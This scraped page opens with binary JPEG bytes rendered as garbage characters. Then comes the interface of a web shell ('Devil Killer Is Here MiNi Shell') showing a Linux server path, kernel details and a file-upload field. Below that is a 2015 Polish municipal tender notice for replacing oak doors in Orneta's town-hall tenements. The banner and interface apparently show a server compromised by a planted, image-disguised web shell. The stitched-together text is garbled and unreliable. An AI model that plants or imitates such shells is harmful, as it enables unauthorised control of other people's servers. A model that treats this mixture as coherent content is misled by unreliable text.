JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150520/119034-N-2015.html

<p class="kh_header"><b>Orneta: Renowacja lub wymiana stolarki okiennej i drzwiowej w budynku  Ratusza Miejskiego wraz z kamieniczkami - Etap III. Wymiana stolarki drzwiowej w kamieniczce  A, C i D</b><br>
<b>Numer ogłoszenia: 119034 - 2015; data zamieszczenia: 20.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orneta , pl.    Wolności 26, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 055 2421116, faks 055 2422990.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.orneta.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Renowacja lub wymiana stolarki okiennej i drzwiowej w budynku  Ratusza Miejskiego wraz z kamieniczkami - Etap III. Wymiana stolarki drzwiowej w kamieniczce  A, C i D.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Określenie przedmiotu zamówienia: 
Przedmiotem zamówienia jest zadanie pn. Renowacja lub wymiana stolarki okiennej i drzwiowej w budynku  Ratusza Miejskiego wraz z kamieniczkami - Etap III. Wymiana stolarki drzwiowej w kamieniczce  A,  C i D 
2.Zakres przedmiotu zamówienia obejmuje:
1)Kamieniczka A
a)demontaż istniejących drzwi zewnętrznych drewnianych jednoskrzydłowych wraz z ich transportem i utylizacją -  2,15 m2 
b)dostawę + montaż nowych drzwi DA1 zewnętrznych, jednoskrzydłowych,  z drewna dębowego  - 2,15 m2.
Drzwi DA1 wg Wykazu stolarki drzwiowej WS-3 (rys. nr 15) należy wykonać zgodnie opisem technicznym, rys. 18 (Drzwi DA1)  i  rys. 41 (Klamka do drzwi DA1)  Załącznika nr 1 (PB + PW) Rozdziału VII SIWZ oraz załącznikiem nr 2 (inwentaryzacja) Rozdziału VII SIWZ. 
c)naprawę ścian i ich  wykończenia obejmującą m.in. - tynkowanie, szpachlowanie, malowanie ościeży  i ścian wewnętrznych w zakresie tego wymagającym oraz naprawę uszkodzeń ościeży zewnętrznych  po wymianie drzwi 
2)Kamieniczka C
a)demontaż istniejących drzwi zewnętrznych, jednoskrzydłowych, drewnianych wraz z ich transportem i utylizacją -  5,14 m2 
b)dostawę + montaż nowych drzwi DC1 i DC2  zewnętrznych, jednoskrzydłowych,  z drewna dębowego  -  5,14 m2.
Drzwi DC1 i DC2 wg Wykazu stolarki drzwiowej WS-3 (rys. nr 15) należy wykonać zgodnie opisem technicznym , rys. 25 (Drzwi DC1), rys. 26 (Drzwi DC2), rys. 42 (Klamka do drzwi DC2)   i  rys. 44 (Klamka do drzwi DC1) Załącznika nr 1 (PB + PW) Rozdziału VII SIWZ oraz Załącznikiem nr 2 (inwentaryzacja) Rozdziału VII SIWZ 
c)naprawę ścian i ich  wykończenia obejmującą m.in. - tynkowanie, szpachlowanie, malowanie ościeży  i ścian wewnętrznych w zakresie tego wymagającym oraz naprawę uszkodzeń ościeży zewnętrznych  po wymianie drzwi 
3)Kamieniczka D
a)demontaż istniejących drzwi zewnętrznych drewnianych jednoskrzydłowych wraz z ich transportem i utylizacją -  2,31 m2 
b)dostawę + montaż nowych drzwi DD1 zewnętrznych, jednoskrzydłowych,  z drewna dębowego   -  2,31 m2.
Drzwi DD1 wg Wykazu stolarki drzwiowej WS-3 (rys. nr 15) należy wykonać zgodnie opisem technicznym , rys. 27 (Drzwi DD1)  i  rys. 45 (Klamka do drzwi DD1) Załącznika nr 1 (PB + PW) Rozdziału VII SIWZ oraz Załącznikiem nr 2 (inwentaryzacja) Rozdziału VII SIWZ  
c)naprawę ścian i ich  wykończenia obejmującą m.in. - tynkowanie, szpachlowanie, malowanie ościeży  i ścian wewnętrznych w zakresie tego wymagającym oraz naprawę uszkodzeń ościeży zewnętrznych  po wymianie drzwi 
4) Wykonanie wszelkich robót budowlanych, usług, prac pomocniczych i towarzyszących,  badań itp. niezbędnych do prawidłowego wykonania przedmiotu zamówienia w okresie jego realizacji oraz w okresie gwarancji jakości i rękojmi za wady wymienionych w § 1 ust.3 Projektu umowy Rozdziału IV SIWZ i pkt 4 Opisu  przedmiotu zamówienia Rozdziału III SIWZ
4.Szczegółowy opis i zakres przedmiotu zamówienia został przedstawiony za pomocą: 
1)Dokumentacji projektowej Rozdziału VII SIWZ tj    
a)  Projektu budowlanego i wykonawczego Architektura   Wyciąg  Projekt drzwi dotyczący Etapu III  - załącznik nr 1 Rozdziału VII  SIWZ 
b)Inwentaryzacji -  Wyciąg  Inwentaryzacja drzwi dotycząca Etapu III  - załącznik nr 2 Rozdziału VII  SIWZ 
c)Pozwoleń na prowadzenie robót - załącznik nr 3 Rozdziału VII  SIWZ tj 
a.pozwolenia na budowę - Decyzja Nr Or/64/2010 z dnia 03.03.2010r. Starosty  
Lidzbarskiego 
b.pozwolenia na podejmowanie innych działań przy zabytku polegających m.in. na 
wymianie stolarki  drzwiowej w kamieniczkach A, C i D - Decyzja Nr 37/2015 z dnia  
04.02.2015r.  Warmińsko -  Mazurskiego Wojewódzkiego Konserwatora  Zabytków 
2)Specyfikacji technicznej wykonania i odbioru robót  Rozdziału VI SIWZ
3)Opisu przedmiotu zamówienia Rozdziału III SIWZ
4)Przedmiaru robót Rozdziału V SIWZ
Uwaga:  Przedmiar robót Rozdziału V SIWZ stanowi element pomocniczy, poglądowy, informacyjny, wspomagający  wycenę  robót budowlanych i obliczenie ceny oferty.    
Przedmiar robót służy tylko do uzupełnienia opisu przedmiotu  zamówienia i nie  
stanowi podstawy do wyliczenia ceny oferty i późniejszego rozliczania Umowy.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6  ustawy Pzp .  Wielkość zamówienia uzupełniającego do 50 % wartości zamówienia podstawowego.
Przewidywany zakres zamówienia uzupełniającego to m.in. wymiana stolarki drzwiowej zewnętrznej w budynku Ratusza Miejskiego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.10.00-4, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW           
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-   oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał,  że w okresie ostatnich pięciu lat przed upływem terminu składania ofert , a  jeżeli okres prowadzenia działalności jest  krótszy  w  tym okresie wykonał w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej:    
a)  jedną robotę budowlaną (w ramach jednej umowy) polegającą na dostawie i montażu (wymianie) stolarki budowlanej (okien i/lub drzwi) w budynku(ach) objętym(ch) ochroną konserwatora zabytków (na prowadzenie robót budowlanych przy  zabytku było wymagane zezwolenie konserwatora zabytku) o  wartości  nie mniejsza niż 22 000 zł brutto 
Wykazane przez Wykonawcę roboty budowlane muszą być zakończone i odebrane przez ich zleceniodawców. 
Ocena spełnienia warunku nastąpi  na podstawie  załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych w  § 6 ust. 1 pkt 1 i 2 IDW tj 
-   oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW Rozdziału II SIWZ
-   wykazu robót budowlanych  wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie z  podaniem ich rodzaju i  wartości, daty i miejsca wykonania sporządzonego wg Załącznika nr 4 do IDW  oraz załączeniem dowodów dotyczących najważniejszych robót budowlanych określających, czy  roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW           
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-   oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW           
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-   oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW           
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-   oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW Rozdziału II SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca wskazuje w wykazie roboty budowlane w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia opisanego w pkt III.3.2 niniejszego ogłoszenia oraz § 5 ust. 2 pkt 2 IDW Rozdziału I SIWZ .;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz oferty sporządzony wg Załącznika nr 1 do IDW Rozdziału II SIWZ 
2)Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru, a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego ( jeżeli dana sytuacja dotyczy wykonawcy) 
3)Wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom według załącznika nr 5 do IDW Rozdziału II SIWZ 
4)Zastrzeżenie informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji sporządzone wg załącznika nr 6 do IDW Rozdziału II SIWZ 
5) Zestawienie elementów przedmiotu zamówienia sporządzone zgodnie z § 12 IDW Rozdziału I SIWZ wg załącznika nr 8 do IDW Rozdziału II SIWZ:</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - Okres gwarancji - 6</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy Pzp Zamawiający dopuszcza możliwość dokonania czynności  prawnej polegającej na zmianie postanowień zawartej umowy w sprawie zamówienia  publicznego w stosunku  do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2. Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian  zawartej umowy:
1)Konieczność zmiany  terminu wykonania  przedmiotu zamówienia z uwagi na: 
a)wystąpienie w trakcie realizacji przedmiotu Umowy robót dodatkowych zgodnie z art. 67 ust.1 pkt 5 ustawy Pzp lub zamiennych opóźniających lub wstrzymujących realizację zamówienia podstawowego objętego Umową , mających wpływ na wymagany  termin zakończenia jego realizacji 
b)konieczność wprowadzenia zmian w dokumentacji projektowej w trakcie realizacji 
przedmiotu Umowy z przyczyn niezależnych od  Wykonawcy 
c)działania osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub  czasowe zawieszenie realizacji przedmiotu zamówienia z powodów niezawinionych przez Wykonawcę, 
d)działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności utrudniającej wykonanie robót, w tym przeprowadzenie prób i sprawdzeń, dokonanie odbioru. 
e)nie przekazanie placu budowy w terminie do 30 dni od daty podpisania umowy,
f)zmiany prawa o charakterze bezwzględnie obowiązującym  - powodująca konieczność wydłużenia procesu budowlanego (dodatkowe czynności prawne i  faktyczne nakazane  prawem nie występujące w dacie zawarcia umowy, chyba, że  w/w zmiany prawa winny być   znane stronom w sytuacji odłożonego ich wejścia w   życie - vacatio legis,
g)wystąpienia innych uzasadnionych okoliczności,  nie powstałych z winy bądź zaniedbania Wykonawcy  lub których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
W przypadku wystąpienia którejkolwiek z w/w okoliczności termin realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności tj o okres opóźniający lub wstrzymujący realizację zamówienia potwierdzony przez   Zamawiającego lub Inspektora Nadzoru Inwestorskiego.   
2)Zmianę wynagrodzenia wykonawcy w przypadku:
a)wystąpienia robót zamiennych (zamiennych rozwiązań technologicznych, zamiennych  materiałów) 
b)zmniejszenia zakresu przedmiotowego zamówienia, w szczególności na skutek:
-ograniczenia zakresu rzeczowego przedmiotu Umowy o którym mowa w ppkt 3
-odstąpienia od realizacji jakiegokolwiek zakresu robót budowlanych objętych zamówieniem w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający nie przewidywał; 
W/w  sytuacjach Zamawiającemu przysługuje prawo do  zmniejszenia wynagrodzenia 
ryczałtowego Wykonawcy, o wartość której  wysokość zostanie  wyliczona na podstawie wartości  jednostkowych robót lub wartości  czynników produkcji (R, M, S, Ko, Z, Kz) przyjętych  z kosztorysu ofertowego Wykonawcy  opracowanego metodą  kalkulacji szczegółowej  i ilości faktycznie zmniejszonego zakresu rzeczowego robót przedmiotu zamówienia. W takim przypadku Wykonawca nie będzie wnosił roszczeń w stosunku do Zamawiającego z tytułu utraconego przychodu, zysku lub innych korzyści jakie mógł odnieść realizując pełen zakres robót opisanych Umową.
c)zmiany stawki podatku VAT 
3)Ograniczenia zakresu rzeczowego przedmiotu Umowy w   sytuacji, gdy wykonanie  danych robót będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami, wykonania przedmiotu Umowy  tzw.  roboty zaniechane
4)Konieczność zrealizowania jakiejkolwiek części robót, objętych przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w dokumentacji projektowej, a wynikających ze stwierdzonych wad tej dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wykonaniem nienależytym przedmiotu Umowy,
5)Zmiana Przedstawicieli stron na budowie po stronie wykonawcy, w następujących  
przypadkach:
a)śmierci, choroby lub innych zdarzeń losowych,
b)niewywiązywania się z obowiązków wynikających z umowy,
c)jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy,
6)Zmiany lub rezygnacji z podwykonawcy dotyczącej podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art.26 ust.2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1. Wykonawca jest obowiązany wykazać, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia publicznego. 
7)Zmianę w zatrudnieniu podwykonawców w przypadku, gdy Wykonawca oświadczył, iż  wykona umowę osobiście w zakresie zgodnym ze SIWZ oraz zmiany osobowej   
podwykonawców oraz zakresu podwykonawstwa, 
8)Oznaczenie stron umowy, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo  
zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego oznaczenia strony (firmy) wynikającego z prawa albo dozwolonych prawem  czynności powodujących taką zmianę.
9)Powstanie rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie  będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony; 
10)Konieczność wprowadzenia  zmian  wynikających z okoliczności, których nie można  było przewidzieć w chwili zawarcia umowy, a są one korzystne dla Zamawiającego      
